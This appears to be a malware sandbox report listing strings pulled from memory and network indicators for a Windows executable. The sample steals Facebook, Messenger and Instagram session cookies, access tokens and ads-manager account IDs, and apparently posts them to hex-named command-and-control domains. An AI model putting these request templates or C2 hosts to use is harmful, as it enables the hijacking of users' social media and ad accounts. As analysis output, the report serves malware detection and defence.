Source: 83C12B0D0FA88B10.exeString found in binary or memory: _time":"13245950599128816","lastpingday":"13245947458518717","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exeString found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.263407616.0000000003EF2000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com&#J$ equals www.youtube.com (Youtube)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknownDNS traffic detected: queries for: c41676c07a61a961.com
Source: unknownHTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 79Host: 9a3a97f6f45f2c2b.com
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://9A3A97F6F45F2C2B.com/
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://9A3A97F6F45F2C2B.com/2
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.306910865.0000000003F8F000.00000004.00000001.sdmpString found in binary or memory: http://9A3A97F6F45F2C2B.com/info_old/ddd
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.286615363.0000000003F8E000.00000004.00000001.sdmpString found in binary or memory: http://9A3A97F6F45F2C2B.com/info_old/g
Source: IpB8f8qwze.exe, 00000000.00000002.261009194.0000000002C90000.00000004.00000040.sdmp, 83C12B0D0FA88B10.exe, 00000002.00000003.286615363.0000000003F8E000.00000004.00000001.sdmpString found in binary or memory: http://9A3A97F6F45F2C2B.com/info_old/w
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://9A3A97F6F45F2C2B.com/info_old/w6
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273150697.000000000071C000.00000004.00000020.sdmpString found in binary or memory: http://9A3A97F6F45F2C2B.com/info_old/wppyG$
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://9A3A97F6F45F2C2B.com/o
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273150697.000000000071C000.00000004.00000020.sdmpString found in binary or memory: http://9a3a97f6f45f2c2b.com/
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://9a3a97f6f45f2c2b.com/info_old/w
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://9a3a97f6f45f2c2b.com/rl
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://A36E971E03D9CBF8.com/I
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://A36E971E03D9CBF8.com/d
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.306910865.0000000003F8F000.00000004.00000001.sdmpString found in binary or memory: http://A36E971E03D9CBF8.com/info_old/ddd
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.306910865.0000000003F8F000.00000004.00000001.sdmpString found in binary or memory: http://A36E971E03D9CBF8.com/info_old/dddm
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://A36E971E03D9CBF8.com/info_old/w
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://C41676C07A61A961.com/
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.306910865.0000000003F8F000.00000004.00000001.sdmpString found in binary or memory: http://C41676C07A61A961.com/info_old/ddd
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://C41676C07A61A961.com/info_old/wM
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273118658.000000000070F000.00000004.00000020.sdmpString found in binary or memory: http://a36a97f6f45f2c2b.com/
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://a36e971e03d9cbf8.com/
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.273069439.00000000006F5000.00000004.00000020.sdmpString found in binary or memory: http://c41676c07a61a961.com/lV
Source: ecv953D.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecv953D.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: ecv953D.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecv953D.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecv953D.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecv953D.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 83C12B0D0FA88B10.exe, 83C12B0D0FA88B10.exe, 00000004.00000003.263407616.0000000003EF2000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000003.271498084.0000000003EF0000.00000004.00000001.sdmpString found in binary or memory: http://clients2.google.com/service/update2/crx
Source: ecv953D.tmp.9.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: ecv953D.tmp.9.drString found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: 1615173766196.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1615173766196.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1615173766196.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl.globalsign.com/root.crl0V
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: download_engine.dll.2.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecv953D.tmp.9.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.264140582.0000000003EFE000.00000004.00000001.sdmpString found in binary or memory: http://docs.google.com/
Source: 83C12B0D0FA88B10.exe, 00000004.00000003.264140582.0000000003EFE000.00000004.00000001.sdmpString found in binary or memory: http://drive.google.com/
Source: ecv953D.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL
Source: ecv953D.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1N
Source: ecv953D.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijc4NDFiMmZlNWMxZGU2M2JkNDdjMGQzZWI3NjIzYjlkNWU5N
Source: ecv953D.tmp.9.drString found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiN
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA7XCQ3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuG4N?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuQtg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTly?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuY5J?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuZko?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuqZ9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvrrg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecv953D.tmp.9.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXiwM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
